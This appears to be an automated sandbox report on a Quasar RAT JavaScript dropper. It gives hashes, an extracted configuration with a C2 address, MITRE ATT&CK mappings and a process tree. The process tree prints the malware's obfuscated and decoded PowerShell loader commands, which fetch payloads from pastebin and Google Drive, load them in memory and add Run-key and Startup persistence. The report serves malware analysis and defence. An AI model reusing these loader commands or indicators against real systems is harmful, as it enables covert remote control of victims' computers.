quasar | e38b8f0ae53c24d62f7b0580891be2bfc4a3c855dcf2ee01fc64c0439777bdc9

General

Target

Pix_id8680.js
Size

18KB
MD5

1311ee7d5350ada4e1670432f2f2618f
SHA1

e25c980202fcdf06511734c37ca703e012626c62
SHA256

e38b8f0ae53c24d62f7b0580891be2bfc4a3c855dcf2ee01fc64c0439777bdc9
SHA512

187f23f3a381563c2eeb9c273ddd34bd9c044283579f6000a1dc6595a62aa50cf4faa28f644107140f66a8e234bf5258bfcc30930c70143edcdf966c747a814a
SSDEEP

384:PnmDxlzTVyhWrKLDrRX/Y3CBOj0xDusFM623U84:vmDxvVQrB/YSBOj0xKsMlH4

Score

10^/10

quasar recomeco defense_evasion discovery execution persistence spyware trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://pastebin.com/raw/gk5zDwdG

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Family

quasar

Version

2.8.0.1

Botnet

Recomeco

C2

15.235.61.212:5552

Mutex

rQp3LFG3Jkv7ob8MOH

Attributes

encryption_key
VYA1GjjnuckdAWisXsLT
install_name
Venom.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Venom Client Startup

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/60-57-0x0000000000400000-0x00000000004EC000-memory.dmp	family_quasar

Blocklisted process makes network request 4 IoCs

flow	pid	Process
7	5064	powershell.exe
11	5064	powershell.exe
19	5064	powershell.exe
27	2368	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	wscript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_s = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft SyS\\ejslm.ps1' \";exit"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3296	powershell.exe
5064	powershell.exe
3332	powershell.exe
2368	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
6	pastebin.com
7	pastebin.com
27	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
28	ip-api.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2368 set thread context of 60	2368	powershell.exe	98

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
3296	powershell.exe
3296	powershell.exe
5064	powershell.exe
5064	powershell.exe
3332	powershell.exe
3332	powershell.exe
2368	powershell.exe
2368	powershell.exe
2368	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	3296	powershell.exe
Token: SeDebugPrivilege	5064	powershell.exe
Token: SeDebugPrivilege	3332	powershell.exe
Token: SeDebugPrivilege	2368	powershell.exe
Token: SeDebugPrivilege	60	RegAsm.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1820 wrote to memory of 3296	1820	wscript.exe	84
PID 1820 wrote to memory of 3296	1820	wscript.exe	84
PID 3296 wrote to memory of 5064	3296	powershell.exe	86
PID 3296 wrote to memory of 5064	3296	powershell.exe	86
PID 5064 wrote to memory of 3332	5064	powershell.exe	90
PID 5064 wrote to memory of 3332	5064	powershell.exe	90
PID 5064 wrote to memory of 2368	5064	powershell.exe	96
PID 5064 wrote to memory of 2368	5064	powershell.exe	96
PID 5064 wrote to memory of 2244	5064	powershell.exe	97
PID 5064 wrote to memory of 2244	5064	powershell.exe	97
PID 2368 wrote to memory of 60	2368	powershell.exe	98
PID 2368 wrote to memory of 60	2368	powershell.exe	98
PID 2368 wrote to memory of 60	2368	powershell.exe	98
PID 2368 wrote to memory of 60	2368	powershell.exe	98
PID 2368 wrote to memory of 60	2368	powershell.exe	98
PID 2368 wrote to memory of 60	2368	powershell.exe	98
PID 2368 wrote to memory of 60	2368	powershell.exe	98
PID 2368 wrote to memory of 60	2368	powershell.exe	98

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Pix_id8680.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1820
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $FDGOy_TzTjf = 'JレBWレGUレcgBwレG8レdwBlレHIレIレレ9レCレレJレBoレG8レcwB0レC4レVgBlレHIレcwBpレG8レbgレuレE0レYQBqレG8レcgレuレEUレcQB1レGEレbレBzレCgレMgレpレDsレSQBmレCレレKレレkレFYレZQByレHレレbwB3レGUレcgレpレCレレewレkレHレレYQBzレHQレYQレgレD0レIレBbレFMレeQBzレHQレZQBtレC4レSQBPレC4レUレBhレHQレaレBdレDoレOgBHレGUレdレBUレGUレbQBwレFレレYQB0レGgレKレレpレDsレZレBlレGwレIレレoレCQレcレBhレHMレdレBhレCレレKwレgレCcレXレBVレHレレdwBpレG4レLgBtレHMレdQレnレCkレOwレkレFUレUgBMレEsレQgレgレD0レIレレnレGgレdレB0レHレレcwレ6レC8レLwBkレHIレaQB2レGUレLgBnレG8レbwBnレGwレZQレuレGMレbwBtレC8レdQBjレD8レZQB4レHレレbwByレHQレPQBkレG8レdwBuレGwレbwBhレGQレJgBpレGQレPQレnレDsレJレBXレGkレbgBWレGUレcgレgレD0レIレレkレGUレbgB2レDoレUレBSレE8レQwBFレFMレUwBPレFIレXwBBレFIレQwBIレEkレVレBFレEMレVレBVレFIレRQレuレEMレbwBuレHQレYQBpレG4レcwレoレCcレNgレ0レCcレKQレ7レGkレZgレgレCgレJレBXレGkレbgBWレGUレcgレpレCレレewレkレFUレUgBMレEsレQgレgレD0レIレレoレCQレVQBSレEwレSwBCレCレレKwレgレCcレVwレxレDEレMgBBレGQレUレBmレEkレMレBQレEMレNwBoレGIレcwBjレGkレXwレ1レF8レMレBfレGUレVQレ3レE4レdwBNレFoレaレBmレDQレeレレnレCkレIレレ7レH0レZQBsレHMレZQレgレHsレJレBVレFIレTレBLレEIレIレレ9レCレレKレレkレFUレUgBMレEsレQgレgレCsレIレレnレDEレYgByレGoレNQBqレHEレbgBxレFIレeレBDレEQレNgBWレGgレZgBoレEEレbgレyレHIレYwBWレGYレcwBSレG8レNwBEレDgレZwByレCcレKQレgレDsレfQレ7レCQレTwBDレFIレaQBhレCレレPQレgレCgレTgBlレHcレLQBPレGIレagBlレGMレdレレgレE4レZQB0レC4レVwBlレGIレQwBsレGkレZQBuレHQレKQレgレDsレJレBPレEMレUgBpレGEレLgBFレG4レYwBvレGQレaQBuレGcレIレレ9レCレレWwBTレHkレcwB0レGUレbQレuレFQレZQB4レHQレLgBFレG4レYwBvレGQレaQBuレGcレXQレ6レDoレVQBUレEYレOレレgレDsレJレBPレEMレUgBpレGEレLgBEレG8レdwBuレGwレbwBhレGQレRgBpレGwレZQレoレCQレVQBSレEwレSwBCレCwレIレレkレHレレYQBzレHQレYQレgレCsレIレレnレFwレVQBwレHcレaQBuレC4レbQBzレHUレJwレpレCレレOwレkレEYレbwBsレGQレUwB0レGEレcgB0レHUレcレレgレD0レIレレoレCcレQwレ6レFwレVQBzレGUレcgBzレFwレJwレgレCsレIレBbレEUレbgB2レGkレcgBvレG4レbQBlレG4レdレBdレDoレOgBVレHMレZQByレE4レYQBtレGUレIレレpレDsレJレBmレGkレbレBlレCレレPQレgレCgレJレBwレGEレcwB0レGEレIレレrレCレレJwBcレFUレcレB3レGkレbgレuレG0レcwB1レCcレKQレ7レCレレcレBvレHcレZQByレHMレaレBlレGwレbレレuレGUレeレBlレCレレdwB1レHMレYQレuレGUレeレBlレCレレJレBmレGkレbレBlレCレレLwBxレHUレaQBlレHQレIレレvレG4レbwByレGUレcwB0レGEレcgB0レCレレOwレgレEMレbwBwレHkレLQBJレHQレZQBtレCレレJwレlレEQレQwBQレEoレVQレlレCcレIレレtレEQレZQBzレHQレaQBuレGEレdレBpレG8レbgレgレCgレIレレkレEYレbwBsレGQレUwB0レGEレcgB0レHUレcレレgレCsレIレレnレFwレQQBwレHレレRレBhレHQレYQBcレFIレbwBhレG0レaQBuレGcレXレBNレGkレYwByレG8レcwBvレGYレdレBcレFcレaQBuレGQレbwB3レHMレXレBTレHQレYQByレHQレIレBNレGUレbgB1レFwレUレByレG8レZwByレGEレbQBzレFwレUwB0レGEレcgB0レHUレcレレnレCレレKQレgレC0レZgBvレHIレYwBlレCレレOwBwレG8レdwBlレHIレcwBoレGUレbレBsレC4レZQB4レGUレIレレtレGMレbwBtレG0レYQBuレGQレIレレnレHMレbレBlレGUレcレレgレDEレOレレwレCcレOwレgレHMレaレB1レHQレZレBvレHcレbgレuレGUレeレBlレCレレLwByレCレレLwB0レCレレMレレgレC8レZgレgレH0レZQBsレHMレZQレgレHsレWwBTレHkレcwB0レGUレbQレuレE4レZQB0レC4レUwBlレHIレdgBpレGMレZQBQレG8レaQBuレHQレTQBhレG4レYQBnレGUレcgBdレDoレOgBTレGUレcgB2レGUレcgBDレGUレcgB0レGkレZgBpレGMレYQB0レGUレVgBhレGwレaQBkレGEレdレBpレG8レbgBDレGEレbレBsレGIレYQBjレGsレIレレ9レCレレewレkレHQレcgB1レGUレfQレ7レFsレUwB5レHMレdレBlレG0レLgBOレGUレdレレuレFMレZQByレHYレaQBjレGUレUレBvレGkレbgB0レE0レYQBuレGEレZwBlレHIレXQレ6レDoレUwBlレGMレdQByレGkレdレB5レFレレcgBvレHQレbwBjレG8レbレレgレD0レIレBbレFMレeQBzレHQレZQBtレC4レTgBlレHQレLgBTレGUレYwB1レHIレaQB0レHkレUレByレG8レdレBvレGMレbwBsレFQレeQBwレGUレXQレ6レDoレVレBsレHMレMQレyレDsレJレBhレHYレUレBDレGEレXwBnレHEレQQBhレHUレIレレ9レCレレKレBOレGUレdwレtレE8レYgBqレGUレYwB0レCレレTgBlレHQレLgBXレGUレYgBDレGwレaQBlレG4レdレレpレDsレJレBhレHYレUレBDレGEレXwBnレHEレQQBhレHUレLgBFレG4レYwBvレGQレaQBuレGcレIレレ9レCレレWwBTレHkレcwB0レGUレbQレuレFQレZQB4レHQレLgBFレG4レYwBvレGQレaQBuレGcレXQレ6レDoレVQBUレEYレOレレ7レCQレYQB2レFレレQwBhレF8レWgBiレEsレaQBzレCレレPQレgレCQレYQB2レFレレQwBhレF8レZwBxレEEレYQB1レC4レRレBvレHcレbgBsレG8レYQBkレFMレdレByレGkレbgBnレCgレIレレnレGgレdレB0レHレレcwレ6レC8レLwBwレGEレcwB0レGUレYgBpレG4レLgBjレG8レbQレvレHIレYQB3レC8レZwBrレDUレegBEレHcレZレBHレCcレIレレpレDsレJレBhレHYレUレBDレGEレXwBnレHEレQQBhレHUレIレレ9レCレレJレBhレHYレUレBDレGEレXwBnレHEレQQBhレHUレLgBEレG8レdwBuレGwレbwBhレGQレUwB0レHIレaQBuレGcレKレレgレCQレYQB2レFレレQwBhレF8レWgBiレEsレaQBzレCレレKQレ7レFsレQgB5レHQレZQBbレF0レXQレgレCQレYQB2レFレレQwBhレF8レVQBRレFレレcレBaレCレレPQレgレFsレUwB5レHMレdレBlレG0レLgBDレG8レbgB2レGUレcgB0レF0レOgレ6レEYレcgBvレG0レQgBhレHMレZQレ2レDQレUwB0レHIレaQBuレGcレKレレgレCQレYQB2レFレレQwBhレF8レZwBxレEEレYQB1レC4レUgBlレHレレbレBhレGMレZQレoレCレレJwCTIToレkyEnレCレレLレレgレCcレQQレnレCレレKQレgレCkレOwBbレFMレeQBzレHQレZQBtレC4レQQBwレHレレRレBvレG0レYQBpレG4レXQレ6レDoレQwB1レHIレcgBlレG4レdレBEレG8レbQBhレGkレbgレuレEwレbwBhレGQレKレレgレCQレYQB2レFレレQwBhレF8レVQBRレFレレcレBaレCレレKQレuレEcレZQB0レFQレeQBwレGUレKレレgレCcレQwBsレGEレcwBzレEwレaQBiレHIレYQByレHkレMwレuレEMレbレBhレHMレcwレxレCcレIレレpレC4レRwBlレHQレTQBlレHQレaレBvレGQレKレレgレCcレcレByレEYレVgBJレCcレIレレpレC4レSQBuレHYレbwBrレGUレKレレkレG4レdQBsレGwレLレレgレFsレbwBiレGoレZQBjレHQレWwBdレF0レIレレoレCレレJwB0レHgレdレレuレDEレLwレyレDEレMgレuレDEレNgレuレDUレMwレyレC4レNQレxレC8レLwレ6レHレレdレB0レGgレJwレgレCwレIレレnレCUレRレBDレFレレSgBVレCUレJwレsレCレレJwBUレHIレdQBlレCcレIレレpレCレレKQレ7レH0レOwレ=';$FDGOy_TzTjf = $FDGOy_TzTjf.replace('レ','A');$FDGOy_TzTjf = [System.Convert]::FromBase64String( $FDGOy_TzTjf ) ;$FDGOy_TzTjf = [System.Text.Encoding]::Unicode.GetString( $FDGOy_TzTjf );$FDGOy_TzTjf = $FDGOy_TzTjf.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\Pix_id8680.js');powershell $FDGOy_TzTjf
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3296
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Verpower = $host.Version.Major.Equals(2);If ($Verpower) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$URLKB = 'https://drive.google.com/uc?export=download&id=';$WinVer = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ($WinVer) {$URLKB = ($URLKB + 'W112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$URLKB = ($URLKB + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$OCRia = (New-Object Net.WebClient) ;$OCRia.Encoding = [System.Text.Encoding]::UTF8 ;$OCRia.DownloadFile($URLKB, $pasta + '\Upwin.msu') ;$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Pix_id8680.js' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$avPCa_gqAau = (New-Object Net.WebClient);$avPCa_gqAau.Encoding = [System.Text.Encoding]::UTF8;$avPCa_ZbKis = $avPCa_gqAau.DownloadString( 'https://pastebin.com/raw/gk5zDwdG' );$avPCa_gqAau = $avPCa_gqAau.DownloadString( $avPCa_ZbKis );[Byte[]] $avPCa_UQPpZ = [System.Convert]::FromBase64String( $avPCa_gqAau.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $avPCa_UQPpZ ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( 'txt.1/212.16.532.51//:ptth' , 'C:\Users\Admin\AppData\Local\Temp\Pix_id8680.js', 'True' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft SyS\\x2.ps1"
      4⤵
      Adds Run key to start application
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft SyS\ejslm.ps1"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2368
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:60
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Pix_id8680.js"
      4⤵
      PID:2244

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Indicator Removal

1

T1070

File Deletion

Modify Registry

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Daft SyS\ejslm.ps1

Filesize
3.7MB

MD5
2cb328715ac138bdd558f359cad605f3

SHA1
21a4d33698174ac2f3679cfe5fa35d5791126fa6

SHA256
6a2fd6b6185ab4cc80f964862b2ae7c9974f2022af411c931c9f1a97de277d51

SHA512
dbe11c448d53a6694f0e1b04618368e3d36162f9a4ac33252dbd931ee06122309e2db7b1da7bede9b5dde2ba195f7d22a59448a3f43755c6d84214a38a3100ab

Download Submit
C:\Users\Admin\AppData\LocalLow\Daft SyS\x2.ps1

Filesize
313B

MD5
5e3c477fbb484f78aa4a9bb8a25aa152

SHA1
d06c787e6edb9f7f2e6777a5da956c6873bc76bf

SHA256
8e3b6d7aef1b48812abe161038aa48b92dde53953e4111ebac3a79f4c047e7a6

SHA512
5557c89a4a36e605995a08245d806c04b18fc6a03d40b96ed329f9667becbbff578ef5badfefadc0fcc06136b810ec7af897c2fa573cc542d2c26873a2459e80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
aff57c5c51c697fe6db7a667ed9bf0e3

SHA1
da21cd728e30dc5d8973a2840ef5919d83f965ca

SHA256
613983c3b08559da98de4c799cced0b0d626c35e2065a85ba20232c5a088b1e4

SHA512
071ba086883deeffbce9d64186f8f1c7b9af733d847e5c3c6784c394b542da543132b062ddf50434a84187cb39e74326439dc3d70f14e7ceaac3cd59f8ab1409

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_14ecgmkd.nrw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/60-61-0x00000000052A0000-0x0000000005306000-memory.dmp

Filesize
408KB

Download
memory/60-62-0x00000000058F0000-0x0000000005902000-memory.dmp

Filesize
72KB

Download
memory/60-63-0x00000000064F0000-0x000000000652C000-memory.dmp

Filesize
240KB

Download
memory/60-59-0x0000000005920000-0x0000000005EC4000-memory.dmp

Filesize
5.6MB

Download
memory/60-60-0x0000000005370000-0x0000000005402000-memory.dmp

Filesize
584KB

Download
memory/60-64-0x0000000006C30000-0x0000000006C3A000-memory.dmp

Filesize
40KB

Download
memory/60-57-0x0000000000400000-0x00000000004EC000-memory.dmp

Filesize
944KB

Download
memory/2368-56-0x0000011BE4B10000-0x0000011BE4B1A000-memory.dmp

Filesize
40KB

Download
memory/3296-42-0x00007FFE6B120000-0x00007FFE6BBE1000-memory.dmp

Filesize
10.8MB

Download
memory/3296-0-0x00007FFE6B123000-0x00007FFE6B125000-memory.dmp

Filesize
8KB

Download
memory/3296-12-0x00007FFE6B120000-0x00007FFE6BBE1000-memory.dmp

Filesize
10.8MB

Download
memory/3296-11-0x00007FFE6B120000-0x00007FFE6BBE1000-memory.dmp

Filesize
10.8MB

Download
memory/3296-1-0x0000021873350000-0x0000021873372000-memory.dmp

Filesize
136KB

Download
memory/5064-22-0x000002EFC1EF0000-0x000002EFC1EFA000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads